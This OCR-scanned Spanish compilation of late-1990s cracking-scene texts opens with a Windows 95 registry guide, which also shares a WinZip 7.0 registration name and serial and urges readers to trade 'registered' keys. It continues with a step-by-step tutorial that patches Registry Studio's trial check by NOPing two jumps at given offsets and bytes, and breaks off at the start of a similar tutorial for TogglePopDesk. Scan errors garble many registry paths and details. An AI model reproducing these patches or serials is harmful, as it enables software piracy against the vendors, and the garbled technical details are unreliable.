tamaño, etc.), las opciones de accesibilidad como las soundsentry o las stickykeys, los cursores, el escritorio (fondo, tamaño 


de iconos, etc.). Estas opciones son totalmente configurables desde el panel de control. 


c) UnstallLocationsMRU: bastante clarito el nombre, estas "Subkeys” contienen la localización del software instalado, 
contiene por ejemplo todas las localizaciones de programas instalados con "Wizards" como InstallShield, etc. M.R.U. á Most- 
recently-used, self explanatory ;P 


a) Keyboard Layout: como supongo habrás deducido pues contiene la definición de tu teclado, en función de país, etc. Y 
basándose en un método de numeración que todavía sólo está en conocimiento de sus creadores...pijadas... 


e) Network: contiene tus conexiones de red anteriores divididas en dos clases: 


Persistent: define los dispositivos y unidades que defines al dejar marcada la opción de "reconectar al 
desconectar” (valga la redundancia...) las claves contienen información como tu navegador, tu nombre de 


usuario, etc. Estas claves aparecen como iconos en "Mi Pc". 


Recent: las últimas conexiones de red que has realizado sin la opción de reconectar chequeada, aparecen 
en menús desplegables cuando vas a realizar una conexión de red (Path). 


f) ¡RemoteAccess: contiene las configuraciones de los marcadores de conexión en red, se divide en dos ramas: 


Addresses: contiene una definición en binario de cada conexión que tengas montada en "acceso 


telefónico a redes". 


Profile: que se divide a su vez en una rama para cada conexión, en estas ramas encontramos los valores de 
IP, dominio, nombre de usuario, etc. De cada conexión. 


9) ¡Software: todas las "Subkeys” que componen esta "Subkey"” ( me estoy empezando a cansar de key subkey... ) representan 
software instalado en tu PC o software que has tenido instalado, las ramas tienen o bien el nombre del programa o bien el 
nombre del fabricante como distintivo, a veces podemos encontrar claves con el mismo nombre dentro de Local_Machine pero 


normalmente el contenido será distinto en cada caso. 


El contenido de las ramas que podemos encontrar suele ser muy parecido, preferencias del usuario, direcciones 
de archivos guardados y lo más interesante fechas de instalación, nombres de usuario/números de serie y claves 
que determinan si el programa está o no registrado, más adelante tocaremos un poco más este temita tan 


interesante. 


¿? HKEY_LOCAL_MACHINE (HKLM) 


Las diferentes entradas de esta "Key" definen el estado físico de nuestro PC, incluyendo datos sobre el BUS, la memoria del 
sistema y las configuraciones de nuestro hardware y software (registrado / no registrado p.ej.). 


Contiene 7 "Subkeys" que son: 
a) IConfig: en esta rama se guardan las configuraciones de tu hardware que defines a través del 


"Panel de Control" pulsando en el icono de "Sistema". La última configuración antes de apagar el PC se copia a 
HKCC al iniciar el equipo. 


b) lEnum: aquí es donde están guardadas la mayoría de las configuraciones de tu hardware, tales 


como los dispositivos PNP, la BIOS, PCI, ESDI, FLOP, ISAPNP, Monitor, SCSI y los dispositivos de conexión en 
red. 


Cc) Hardware: está dividida en dos ramas: 


Description: que contiene la rama WystemWFloating Point Processor, que será 0 o 1 dependiendo de su 


existencia. 
Devicemap: que contiene la rama Wserialcomm donde se listan tus puertos. 
a) Network: contiene la ramaNLogon que a su vez esta compuesto de los valores LMLogon (será 1 si la 


máquina está en ese momento conectada en red y O en caso contrario), logonvalidated (1 para estar validado), 
Policy Handler, Primary Provider , username, and UserProfiles. 


e) ¡Security: dentro de esta rama hay dos claves, un "Value"nada más abrir esta rama y que apunta a una clave remota 
donde estarán las opciones de seguridad de red como son por ejemplo los derechos de acceso. La "Subkey" Provider contiene 


información del servidor. 


f) ¡Software: la mayoría de las "Subkeys" contenidas aquí nos dan información sobre la versión del programa, su licencia, etc. 
Pero también podemos encontrar otra información interesante como los drivers que se utilizan al conectarse en red, fuentes, 
las características de la emulación de MS/DOS, zona horaria, etc. 


9) ¡System: aquí nos encontramos con una rama de nombre NCurrentControlSet que se abre enWControl y 


Services, cada una de estas ramas están llenas de ramitas, la mayoría son de explicación trivial, todo el mundo 
sabrá o se imaginará qué hace la rama ComputerName o Shutdown o KeyboardLayout, etc. Os puede dar 
problemas VMM32 que es una lista de los VxD que tenéis trabajando y poco más. Cuidado con tocar estas 


configuraciones que os puede dar algún disgusto. 


¿? HKEY_USERS (HKU) 


Aquí se definen las configuraciones de cada usuario y las configuraciones que por defecto se le otorgan a los nuevos usuarios, 
1.Default y inombredeusuario respectivamente. 


Las estructuras de cada una de estas "Subkeys" es semejante a HKCU, al efectuar el "login" se copiarán en HKCU las 
configuraciones contenidas en su Inombredeusuario. 


¿? HKEY_CURRENT_CONFIG (HKCC) 


Los contenidos de esta "Key" se toman al iniciar el ordenata de las configuaciones alojadas en cada perfil de usuario en 
WLocal_MachinelConfig. 


Aquí nos encontramos con tres "Subkeys": 
a) Wisplay: dividido en IFont que contiene las cadenas de valores que determinan las fuentes que pueden 


aparecer en la ventana principal y WSettings que contiene las cadenas de valores que determinan: BitsPerPixel, 
diferentes DPls, oemfonts, fixedfon, fonts y Resolution. 


b) Software: donde encontramos detalles de las configuraciones de internet como los proxys o el 

autodial. 

c) System: que sólo contiene una rama WCurrentControlSeticontrolPrintPrinters donde tenemos 

información sobre las impresoras que tenemos definidas a través de InicioaConfiguraciónalmpresoras 
¿? HKEY_DYN_DATA (HKDD) 


En esta "Key" tenemos la información de nuestro sistema detectada al iniciarlo, esta información como su nombre indica es 
dinámica y por lo tanto susceptible de cambiar en cualquier momento lo que hace que parezca que esta clave no se guarda. 


Dentro de HKDD nos topamos con: 
a) 1ConfigManager: con una sola rama de nombre YEnum que se abre en un montón de ramitas numeradas 


que definen el estado, la localización, los problemas detectados y la clave del hardware de los dispositivos PNP 
detectados al iniciar el compiuter. 


b) WPerfStats: las estadísticas del funcionamiento actual del ordenata son guardadas en esta "Subkey" bajo 


apariencia de "Values" en binario, se dice que algunas de las ramas definen el sistema de archivos, o el 


"management" de la memoria pero no he encontrado nada claro en este tema, sólo conjeturas y 
"parecequeeeee..." lo que está claro es que estas claves se refieren al funcionamiento de nuestra amada 
computadora y que indagar en este tema no es de ninguna utilidad para nosotros, de todas formas como el saber 


no ocupa lugar agradecería info de este tema y lo incluiría al momento en este texto. 
c) Security: con una sola rama de nombre WProvider donde encontramos un "espejo" de la rama 


HKLM'SecurityProvider, mientras la primera va cambiando según cambien las propiedades de la red la segunda 
se mantiene estática. 


Ya tenemos definido el registro, lo siguiente que vamos a hacer es aprender a modificarlo, porqueeee para qué nos sirve conocer 
cómo funciona algo si no podemos jugar con ello hasta estropearlo? ;P 


¿? Restaurar el Registro. 


Como más vale prevenir que curar antes de enseñaros cómo urgar en el registro vamos a ver cómo podemos recuperar el registro 
por si las moscas se nos va la pinza y conseguimos que o bien nuestro windown no cargue o bien alguna aplicación parece 
ausente... 


Los pasos para recuperar el registro antiguo son los siguientes: 
1 Haga clic en el botón "Inicio" y, después, en Apagar el sistema. 


2 Haga clic en Reiniciar el equipo en modo MS-DOS y, después, haga clic en "Sí". 


3 Cambie al directorio de Windows. Por ejemplo, si su directorio de Windows es CAWindows, 
deberá escribir: 


cd ciwindows 


4 Escriba los siguientes comandos y presione ENTRAR después de cada uno. (Observe que 
System.da0 y User.da0 contienen el número cero). 


attrib -h -r -s system.dat 


attrib -h -r -s system.da0 


copy system.da0 system.dat 


attrib -h -r -s user.dat 


attrib -h -r -s user.da0 


copy user.da0 user.dat 


5 Reinicie su equipo. 


Con esto conseguiremos restaurar el último registro que cargó correctamente nuestra pcera. 


¿? Almacenamiento de datos en el registro. 


No podemos guardar lo que gustemos en el registro, hay unos límites técnicos y físicos al tipo y tamaño de datos que una aplicación 
puede guardar en el registro, existen ciertas líneas maestras a seguir para promover la eficiencia del sistema. Una aplicación puede 
almacenar información sobre configuraciones y de inicialización en el registro pero otros tipos de datos deben ser guardados en otro 
sitio. 


Generalmente los datos consistentes en más de 2KB deben guardarse como un archivo usando una "Key" que se refiera a la 
localización de estos datos, este mismo proceso debe seguirse para evitar duplicar grandes cantidades de datos en el registro. 


Nunca se debe guardar en el registro código binario ejecutable. 


Un "Value" ocupa mucho menos espacio que una "Key", por esto y para economizar espacio una aplicación puede agrupar datos de 
carácter similar y guardar la estructura como un "Value" mejor que guardarla en "Keys" separadas, si se usa este método es 


aconsejable pasar los datos a binario para evitar incompatibilidades. 


Además y para guardar un orden diferenciaremos, a la hora de meter un dato al registro, entre dos categorías de datos, información 
de la computadora e información del usuario, gracias a esta diferenciación una aplicación puede soportar múltiples usuarios, 
localizar información acerca de un usuario específico a través de una red y usar la información personalizada en distintas 
localizaciones permitiendo así que la localización del perfil de un usuario sea totalmente independiente. 


Por ejemplo cuando una aplicación es instalada puede guardar los datos referentes al ordenata bajo HKEY_LOCAL_MACHINE. 
Puede crear "Subkeys" para el nombre de la compañía, nombre del producto, versión, etc. : 


HKEY_LOCAL_MACHINE SoftwareWNakarkoSoftiExpediente13.0 


La apliación puede guardar la información referente al usuario bajo la "Key" HKEY_CURRENT_USER, como en el ejemplo 
siguiente: HKEY_CURRENT_USERSoftwareWNakarkoSoftExpedientel3.0lUsenkarlitoxZ 


¿? Hands On ;P Modificando el registro manualmente. 


Esto es muy sencillito, tanto como cambiar de nombre a una carpeta mediante el "Explorador" o cambiar las propiedades de un 
archivo con el menú contextual. 


Como esto se hace más fácil de entender gráficamente os pongo un ejemplito pero antes de nada tened muy en cuenta qué es lo 
que váis a modificar, nunca modifiquéis algo que no sabéis para qué sirve o de lo contrario... las claves que menos peligro tienen 
son las claves que encontramos dentro de las "Subkeys" 1Software por lo que ahí va un ejemplillo con una de ellas: 


[HKEY_CURRENT_USER Software WNukeNabber 2.01Options] [keys y Subkeys)] 
"savewindowpos"="0" fvalues, 1=True O=Falsej 

"runminimized"="1" 

"usesystray"="1" 

"stayontop"="0" 


"killportscan"="1" 


"client"="1" 
"Services0"="mirc" 
"langdesc"="Spanish" 
"langnum"="4" 


En esta ramita nos encontramos con opciones del NukeNabber personalizables a través de sus menús, un 1 nos indica que la 
opción está "encendida" y un O pues lo contrario. Tenemos marcada la opción de "runminimized" con lo que el programa trabaja 
minimizado, tenéis aquí un ejemplo de "Value" en binario que inmediatamente vamos a cambiar para que el programa no curre 
minimizado. El tema sería de la siguiente manera: 


1 Abrimos el Regedit.exe alojado en CAWindows. 
2 Click en HKCUa Software a NukeNabber2.0 á Options. 
3 Doble-Click en el "Value" a cambiar, en este caso "runminimized". 


4 Nos aparece una ventanita donde tenemos nombre de valor e información del valor, pulsamos 
en lo segundo e introducimos un O para anular esa opción y le damos al Enter. 


5 Pulsamos F5 para actualizar el registro. 


Sencillo no? Pues a jugar un poquito... Cambiar de nombre a una "Subkey" es todavía más sencillo, idéntico proceso al de cambiar 
de nombre a una carpeta en el "Explorador". 


Se me había olvidado, también podemos modificar la información del registro a través de archivos *.reg, haciendo doble-click sobre 
ellos, dando al menú contextual y eligiendo "Combinar" o abriendo el Regedit.exe y pulsando en el menú "Registro" a "Importar 
archivo del registro" la información que el *.reg contiene se introducirá en nuestro registro. 


¿? Cómo modificar el registro mediante una aplicación (para programadores). 


Antes de meter información al registro una aplicación debe abrir o crear una "Subkey" apoyándose en las "Keys" predefinidas, los 
proggies usan las funciones RegOpenKey o RegOpenKeyEx para abrir una "Key" o "Subkey" y las funciones RegCreateKey o 
RegCreateKeyEx para crear una "Subkey". 


Una apliación puede usar la función RegCloseKey para cerrar una "Subkey" y escribir los datos en el registro, el proceso de escribir 
los datos puede no ser inmediato y los datos pueden estar en caché unos segundo antes de ser volcados al disco duro, para un 
volcado inmediato se usa la función RegFlushKey, lo malo es que esta función chupa muchos recursos y debe ser usada sólo en 


caso de que sea absolutamente necesario. 


Para escribir los datos de un "Value" dentro de una "Sub/Key” una aplicación puede usar las funciones RegSetValue o 
RegSetValueEx, la primera de las funciones sólo trabaja con cadenas ("Values" de tipo REG_SZ), la segunda por el contrario puede 
escribir "Values" con cualquier tipo de datos. Estas dos funciones pueden crear una "Subkey" y su o sus "Values" al mismo tiempo. 


Para borrar un "Value" de una "Sub/Key" usamos la función RegDelete Value, para borrar una "Sub/Key" usamos la función 
RegDeleteKey, no se pueden introducir "Values" o "Subkeys" dentro de una "Key" borrada como es lógico... 


Para cambiar la información sobre la seguridad de una "Sub/Key" podemos usar la función RegSetKeySecurity. 


¿? Obtener información del registro manualmente. 


Sencillito sencillito, basta con darse un rutecillo por el registro con el Regedit.exe y ver qué es lo que tenemos en cada rama, como 
darse una vueta por algún ftpwarez con el CuteFtp. 


Una buena cosa que nos permite el Regedit es "exportar archivo del registro" (menú registro), gracias a esta opción podemos coger 
cualquier rama de nuestro registro, pasarla a un archivo *.reg y compartir esta ramita con nuestros compis, esto de la exportación es 
muy interesante sobre todo si te das una vuelta por las "Subkeys" de Software y compartes tus registered con los demás, vamos a 


ver un ejemplito y así comparto algo con vosotros...que amar es compartir... 
1 Abrimos el Regedit.exe y nos colocamos en la rama del registro que queremos enficherar. 
2 En el menú de Registro, Exportar archivo del Registro. 


3 Se nos abre una ventanita de esas de Save As, en ella elegimos dónde y con qué nombre 
vamos a guardar nuestra ramita, además en la parte inferior de la ventana tenemos la opción 
"Rango de Exportación", si elegimos "Todo" haremos una copia de todo el registro, en cambio si 
elegimos rama seleccionada pues eso, copiamos sólo la rama que queremos copiar. 


4 Ya está todo guardadito, ahora vamos a ver qué coño tiene el *.reg, estos archivos son 
modificables mediante cualquier editor de textos (notepad p.ej.). 


Aquí tenéis un ejemplo de lo que se ve al hacer esto, seguro que os sirve de algo ;P 
REGEDIT4 

[HKEY_CURRENT_USERSoftwareWNico Mak ComputingWinZipWinini] 
"win32_version"="7.0" 

"Name"="karlitoxZ (PNK)" 

"SN"="EA461EF8" 


Por si hay algún despistado esto es el registro del Winzip 7.0... 


¿? Obtener información del registro mediante una aplicación (para programadores) 


Una aplicación para coger información del registro va recorriendo todas las "Subkeys" de una "Key" hasta que encuentra la que 
busca y recoge los datos del "Value" o de los "Values" asociados al primero. 


Una aplicación puede usar las funciones RegEnumKey o RegEnumKeyEx para enumerar las "Subkeys" de una "Key" determinada, 
la primera función nos devuelve sólo la "Subkey" mientras que la segunda nos devuelve también sus componentes. 


Para obtener datos concretos de una "Key" determinada recurrimos a la función RegQueryInfoKey. 
Con la función RegGetKeySecurity obtendremos una descripción de las características de seguridad de esa clave. 


La función RegEnumValue nos sirve para enumerar los "Values" de una "Key" dada y las funciones RegQueryValue y 
RegQueryValueEx nos darán el contenido del "Value" de una "Key" determinada. 


RegEnumValue es llamada para determinar los nombres de los "Values" y RegQueryValueEx para obtener los datos 
contenidos en los "Values" de nombre sacado con RegQueryValue. 


Cuando una aplicación guarda parte de la información del registro en un archivo separado de éste nos encontramos con el 
problema de cargar esta información desde el registro cuando sea necesario, para este proceso nos encontramos con RegSaveKey 
que nos permite guardar una "Key" con sus "Subkeys" y "Values" en un archivo *.reg y con las funciones RegLoadKey para pasar el 
contenido del archivo *.reg al registro (RegUnLoadKey nos sirve para devolver el registro al estado anterior al RegLoadKey), 
RegReplaceKey que modifica una rama del registro según defina el archivo *.reg y RegRestoreKey que devuelve a una rama del 


registro los valores que determina el fichero *.reg. 


Poca cosa más sobre este tema, para hacer esto más tragable he omitido las estructuras de cada una de las funciones, si para alguien son 
de interés y no tiene posibilidad de obtenerlas que me emaile y se las envío ASAP. 


¿? Algunos detallitos de windown modificables gracias al registro.. 


Aquí tenéis unos cuantos trukillos para que esto funcione mejor o debería decir que funcione menos mal? Y algunas tonterías que 
por lo menos a mi hacen que algunas cosas de w95 me molesten un poquito menos... 


1- Mejor rendimiento del disco duro: esto arregla un BUG de la primera versión de w95, vamos a la clave 

HKEY_ LOCAL _MACHINEISOFTWAREWMicrosofA Windows CurrentVersionEEstemplateslServer, aparecen dos Values 
cuyos datos están al revés, debemos poner en NameCache 40 00 00 00 y en PathCache a9 Oa 00 00, en versiones de w95 
superiores a la OSR2 los valores están bien puestos, no hay que cambiarlos pero para que el tema funcione y nuestro HD vaya 
algo más rápido debemos por último ir a Panel de Control a Sistema á Rendimiento á Sistema de Archivos á Disco Duro y allí 


tenemos que poner función típica "Servidor de Red” y optimización avanzada "Completa". 


2- Eliminar elementos del menú ejecutar: Ejecuta el Regedit y ve a la rama 
MipcAHKEY CURRENT_USERSoftwareWMicrosoft4WindowsWCurrentVersionExploreRunMRU 3. Abre esta última 
carpeta y ya puedes eliminar los elementos que no quieras de la lista de la derecha. Aviso! no toques el primer elemento de la 


lista. Reinicia el equipo. 


3- Refresco de ventanas automático: Ejecuta Regedit y ve a la rama 
HKEY_LOCAL_MACHINE System CurrentControlSetiControllUpdate, ahora pulsas el botón derecho y eliges 
Modificar, cambiar el valor 01 por el de 00 y reiniciar el equipo. 


4- Eliminar iconos "imposibles" de eliminar: Ejecuta el regedit y acércate a 
HKEY_ LOCAL MACHINE SoftwareWMicrosofA Windows Current VersionExplorenDesktop/NameSpace, 
borras lo que te sobre y reinicias. 


5- Quitar la animación de las ventanas: esto nos ahorrará un poquito de RAM, vamos a 
HKEY_CURRENT_USERIControl PanellDesktopWindowsMetrics. Creamos un nuevo "Value" de nombre 


MinAnimate, siendo su valor cero. 


6- Aumentar la velocidad de los menús desplegables: vamos a la rama HKEY_CURRENT_USERWDesktop, 
creamos un "Value" de nombre MenuShowDelay y le otorgamos un valor entre 0-10, un 7 es bastante bueno 


pero tu verás. 


Y como estos nos podemos encontrar con 1000 trucos relacionados con el registro, con estos ya vale como ejemplito, yo me quedo 
con el del HD y la animación de las ventanas... 


AgRaDeCiMiEnTOS y EtZs: 


Este texto es un "remix" de un montón de libracos que he encontrado tirados por la red de redes y de articulillos sacados de mi colección de 


revistas, como está claro a estas alturas no voy a descubrir nada nuevo sobre este tema pues todo está dicho ya pero creo que era necesario un 
manual completo y en castellano con miras sobre todo a la ingeniería inversa y a la programación. 


Como nadie es perfecto seguro que en este texto por mucho que lo haya revisado habrá un montón de errores, os agradecería me los hicierais 
llegar vía email para poder corregirlos... 


Principalmente me he basado en la Win32 Programmer's Reference y en el fantástico texto sobre este tema que leí en "MaMMon'“S" del que 
no dudé en copiar cuando me quedé en blanco ;P http://www.cybercity.hko.net/SanFrancisco/mammon y que está sacado de "The 


W9SRegistry" de John Woram (copión que copia a copión tiene 100 años de perdón ;P) y en un montón de webs sobre windown95 donde la 
gente enseña lo poco que sabe y lo mucho que cree saber... 


Agradecimientos pues lo de siempre... 


A los miembros del proyekto como siempre su compañía y ayuda... 


Y esta vez y para variar pues a CaRl9 sus clases "personalizadas" de hacking ;P y a +MaLaTTia toda la ayuda que en su momento me prestó 
en este largo camino de convertirme en +karlitoxZ ¡¡mile gracie bambino!! ;P 


+karlitoxZ Mail : karlitoxOhemspeed.com 


+karlitoxZ irc = IRChispano - EF Net -> KarlitoxZ 


+karlitoxZ web : http://pagina.de/proyektonakarko 


Rekomendaciones 


Una buena recomendación sería que estudiaras lo básico más a fondo de ensamblador con 29A o 
Aesoft y/o La universidad de Guadalajara, también te recomendaría (si eres asiduo a algo de 
programación) a darle un buen vistazo a este curso de Pascal (también por la universidad de 
Guadalajara), ya que con estos cursos, vamos a tener aunque sea que aprender a programar (lo 
básico) en varios lenguajes. Y te recomiendo aprender a programar primero en este sencillo 


> 
er 


¿Donde puedo enkontrar más información acerca de la ingeniería inversa 


lenguaje de programación por Borland 


Un muy buen lugar para encontrar mucha información es el sitio de FRAVIA, y dos sitios 
mu'buena onda son Crackstore.com (Por lo que me dijo el Webmaster de Crackstore, vuelve 


en septiembre con un servidor más rápido) y WkT!. 


$. 
Vi 


Mis palabras finales 


Ojalá que este curso les haya sido de agrado, pues me averguenzo de los otros cursos que hice. 
Les mando saludos de mi parte a las siguientes personas : 


WkT!, evangelion, Hot Byte, SYSmooh, +karlitoxZ, +ORC, +Fravia, tKC, DiabloDX, Soraya 
(Que mujer!!), Razzia, DMA-48, y sobre todo al todopoderoso gigantesco SIGRID (esperamos 
que algún día escribas un tutorial para senseñar todo lo que me has enseñado!). Sin mencionar a 
mi mejor amigo Enrique Palacios. y A J. Hernandez. (Esperamos tu página!), y a Saiya (Sigue 
jugando con tu PSI! vas bien!), Maureen, Anarquia, ¡ceMaN. 


En general dos cosas acerca de mí: 


e Me gusta ayudar, pero no exagero. 
e Soy un puto loco traumado de la cabeza paranoico hasta los huesos. 


SE lo que piensas, así que mueve tu tras-0 y manda un mail con preguntas (solo para ayudar a 
la labor, no aceptaré hazme cracks ni tipos así) o con mis posibles errores, ya que cualquier 
cosa que no se entienda y me manden un mail, los ayudaré cambiando este curso y agregando 
temas .., si quieres ejercitar un ejemplo claro de la teoría de este curso es el programa Quick 
Install Maker 3.0 y puedes encontrarlo en http://www.marchale.com o el famoso Help Pad. 


Ejercita esto. Cualquier probleMilla visitA el hueco de Nuestra páglInA Cool Por el web ubiCada 
en : http://kut.tsx.org, y si tienes suerte la verás (si es que estos putos gringos no me la quitan de 
nuevo por 9 vez!!). Por último, les regalo un truquillo que me regalo este chato mu'buena onda y 
que realmente admito que no sabía -En las propiedades del módem, en 'configuración del 
puerto',pon 'avanzadas', y en donde dice configuración extra agrega esto : 'S11=50' y 
quizás le darás un marcado 'UltraRápido' a tu acceso telefónico a redes. 


Maniac Pc 


Sigrid_mapcHotmail.com 


KrcKerZ United Team 99 


Kayut99O Hotmail.com 
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Programa Registry Studio V1.01 Win9x/NT W95 / W98 / NT 
| Descripción [Estupendo Editor del Registro de Windows Con Muchas Utilidades 
Tipo Trial de 30 dias 
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TNT!Crack!Team Tutorial  rhisiay ca Teldía 


Protección Share 30 dias y Ejecutable Inmodificable 
Dificultad 1) Principiante 
Herramientas Softlce v4, W32dasm v8.9, Heditor HEX ( A tu Gusto ) 
Objetivo Simular estar registrados. 
Cracker Karpoff 


Fecha 


30 de Octubre de 1999 


Introducción 


Bueno este programa cuenta con la tipica limitacion shareware 30 dias y 
una proteccion de mierda que si modificas el programa este no se ejecuta. 
Este programa nos da la opcion de registrarnos mediante el tipico Name y 
S/N, pero lo que haremos sera parchearlo para ver como eliminar este tipo 
de protecciones, que a mi parecer son estupidas ya que supuestamente no 
puedes modificar el ejecutable, pero a Cambio el programador hace una 
libreria dl11 con el mismo nombre que el ejecutable y donde se encuentran 
todos los boletos para sacar tanto el serial valido como aplicarle un 
partche, y este archivo no cuenta con esa proteccion XD pero nada vamos a 
por el ejecutable (regstudio.exe) 


Al Atake 


A trabajar, bien como siempre lo primero es prepararnos todo para trabajar comodamente, 
iniciamos windows cargando el Softlce, hacemos una copia del ejecutable RegStudio.exe con el 
nombre Studio.exe, desensamblamos el original y editamos con el editor Hex la copia Studio.exe 
y por ultimo adelantamos la fecha de windows 1 mes para trabajar con el programa expirado, ya 
tenemos todo a punto :-) 


Ejecutamos RegStudio.exe y lo primero que vemos es una ventanita con la opcion de registrarnos 
y con el siguiente aviso "Trial period has expired. Do you tal y tal" 


Directamente vamos al W32dasm y buscamos esta Cadena de texto en las strign data Refernces 
pulsando sobre [STRN-REF], hay podemos ver la referencia que buscamos, algo que me llamo la 
atencion es que hay poquisimas referencias a Cadenas de texto por ejemplo no vemos ninguna que 
haga referencia a cuantos dias de evaluacion nos quedan, ni el tipico invalid code, Thank you 
for register etc. Y el motivo de esto es la librería regStudio.dll donde se encuentran todas 
estas y muchas mas, de hecho husmeando un poquito si la desensamblais podeis modificar la 
rutina que decide si el reg metido es correcto o no y que os acepte cualquier numero de 
registro, ademas no cuenta con la proteccion que tiene el ejecutable osea que modifiques lo que 
sea el programa se inicia, pero creo que es mas interesante atacar al ejecutable y romperle el 
royo anti inicio que tiene. 


Bueno pulsamos sobre Trial period has expired. Do you y vamos a: 


* Possible StringData Ref from Data Obj ->"Trial period has expired. Do 


00401371 68D4504000 push 004050D4 — Aquí Aparecemos 


00401376 6A00 push 00000000 


y justo encima de esta referencia tenemos este codigo: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401351(C) 


0040135C€ 83F801 cmp eax, 00000001 

0040135F 7509 jne 0040136A -— Salto Interesante 
00401361 5F pop edi 

00401362 5E pop esi 


00401363 81C4F4000000 add esp, 000000F4 


00401369 C3 ret - Retorno Cabron 
* Referenced by a (U)nconditional or (C)onditional Jump at Address 0040135F (C) 
0040136A 6A04 push 00000004 


0040136C 6824564000 push 00405624 


Viendo que tenemos un jne en 0040135F es logico pensar que si este no se ejecuta pillara el 


retorno (ret)que hara que retorne a la llamada(cal1) padre, evitando asi el mensage de 
expiracion, 


0040135F 7509 jne 0040136a por un nop nop para que no se ejecute el salto y no llege nunca a 
mostrarnos el mensage de expired, probemos localizamos el offset de este salto que es 135F y 
nos vamos al editor hex cambiamos el 7509 por un 9090 con esto el salto queda eliminado ya no 
existe, probamos a ejecutar studio.exe y como os comente el programa no hace nada antes de 
abrirse ya se ha cerrado (podeis probar a modificar otras instrucciones, os pasara lo mismo), 
veamos por que puede ocurrir esto. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00401351(C) 


0040135C 83F801 cmp eax, 00000001 

0040135F 7509 jne 0040136A -—- Salto Interesante 
00401361 5F pop edi 

00401362 5E pop esi 


00401363 81C4F4000000 add esp, 000000F4 


00401369 C3 ret - Retorno Cabron 


Bueno pues vemos que si quitamos del medio el jne la siguiente instrucción importante es el 
retorno ( RET) en azul ahora tenemos que aberiguar que llamada (call) es la responsable de que 
este el ret. 


para localizar la llamada(call) responsable de que exista ese ret no tenemos mas opcion que 
utilizar nuestro querido y amado Softlce, ejecutamos la consola del softice cargamos el archivo 
RegStudio.exe. Para saber donde se encuentra el call responsable podemos poner un BreakPoint 
direcctamente a el salto que hemos parcheado antes (aseguraros de que el ejecutable que cargais 
en el softice es el original y que no es el que hemos parcheado) pulsamos el boton de los 
engranajes (load) Y cuando nos salga la tipica ventana del softice aceptamos y entramos directos 
al soft (apuntaros en un papel la direccion de memoria del salto para ponerle un BP) 


Bpx 0040135F 


Pulsamos F5 para que siga la ejecucion del programa e inmediatamente se para en la direccion a 
la que le pusimos el BP, figaros como en 


0040135F 7509 jne 0040136A -— que es donde se para el soft 


hay a su derecha una flecha indicando que este salto se ejecutara a la direccion de memoria que 
indica, claro se salta el RET que nos interesa estudiar, osea que parcheamos el jne como antes 
convirtiendolo en un nop nop, para hacerlo desde le soft metemos el commando [a] que es 
ensamblar 


a 40135f£ [Intro] en azul lo que ponemos pulsamos Intro, y seguimos los pasos 


- 0040135f nop [Intro] 


- 00401360 nop [Intro] 


- 00401360 [Intro] 


y ya hemos partcheado el salto suprimiendolo ahora vamos pulsando F10 hasta llegar al ret y 
cuando llegamos pulsamos otro F10 y justamente nos lleva a 


0040103A E8C1020000 call 00401300 — La responsable del ret 


0040103F 85C0 test eax, eax 


00401041 0F85BE010000 jne 00401205 — muy interesante 


Tenemos localizado la llamada responsable del, ret hechemos un ojo, Esto fue lo que ocurrio 
cuando parcheamos antes el primer salto, y lo convertimos en mierda el ret nos trae a 


0040103F 85C0 test eax, eax — AQUI 


aquí se comprueban los valores de eax si estos son iguales hara que se ejecute 


00401041 0F85BE010000 jne 00401205 - SI SE EJECUTA (MAL CRACKER) 


si se ejecuta nos manda a 


00401205 5F pop edi -— AQUI 
00401206 5E pop esi 
00401207 5D pop ebp 
00401208 33C0 xor eax, eax 
0040120A 5B pop ebx 
0040120B 81C4F4010000 add esp, 000001F4 
00401211 Cc21000 ret 0010 — NOS SACA DEL PROGRAMA 


bueno si no entendeis muy bien os recomiendo que traceeis paso a paso con el softice 


al ejecutarse el salto 00401041 0F85BE010000 jne 00401205 veis que nos lleva a una serie de 
instrucciones que nos sacan inmediatamente del programa he aquí la estupida proteccion, 
si es que esta puesta como tal, aunque creo que si ya que si os fijais en cualquier pedazo de 
codigo encontrais un ret que si lo seguis con el soft nos trae al mismo sitio. 


Ya solo nos queda hacer que no se ejecute nunca este salto, para ello lo eliminamos con una 
serie de 6 nop o 90. Localizamos el offset que es 1041 y vamos a nuestro editor hex donde 
cambiamos 0F85BE010000 por 909090909090 salvamos los cambios y el ejecutable funciona 
perfectamente sin limitaciones de tiempo. 


Recordad que tenemos que parchear los dos saltos que hemos analizado, acordaros tambien de 
volver a poner la fecha actual a windows. 


Pos nada mas, esperando que esto os ayude a aprender un poco mas, hasta el 
proximo. XD 


saludos a todos/as 


karpoff/TNT 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site 


Whiskey Kon Tekila 


Programa TogglePopDesk vL1A-— TogglePopDesk vL1A-— 1A | W95/W98 /NT /W98 / NT 
Toggle PopDesk es un programa que te permite tener todos tus iconos EAT escritorio 
Descripción 
cómodamente ordenados y a la vista con un solo click de ratón. 
Po Tipo Lo Tipo [Trial de 30 dias 
Url http://www.toggle.com 


| Protección Serial Number 

[Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 

| Herramientas [W32dasm v8.93, UltraEdit v6.10a 

[Objetivo Simular estar registrados y obtención de un número de Serie Válido 
A 


Introducción 


No hay mucho más que contar sobre este programa. Simplemente comentar que se 
aprecia una LEVE evolución en la protección empleada respecto a otros programas 
de www.toggle.com. Véase mi Tutorial sobre el Ping+. 


nd 


Que miedo! 


Newbies: Seguimos avanzando :0) 

El esquema de protección empleado por el programador del PopDesk deja bastante 
que desear. Pero nos servirá como una excelente cobaya para dar nuestros primeros 
pasos en la Ingenieria Inversa. ¿Ansioso?, bien.... vamos allá. 


Al Atake 


Al abrir el programa nos aparece una ventana con 2 botones: 


1. Order Now 
2. Ok 


Que bonito! una frasecita que nos cuenta cosas muy curiosas sobre la trepidante historia de la informática. Y 
cambia cada vez que cargamos el Popdesk. Vale vale!! para ya, ¿o es que piensas estar todo el dia leyendote las 
frasecitas? jeje :0) . No apetece mucho ¿verdad?, sigamos. Tenemos dos opciones, pulsar ok, con lo cual nos 
aparece un icono al lado del reloj del windows y despues de ir al menu Settings, pestaña Ordering vemos ke HAY 
Opcion de registro. Total, que daba igual pulsar Order Now al principio que acabariamos en el mismo sitio. :0) 


Enter your Registration Code. 
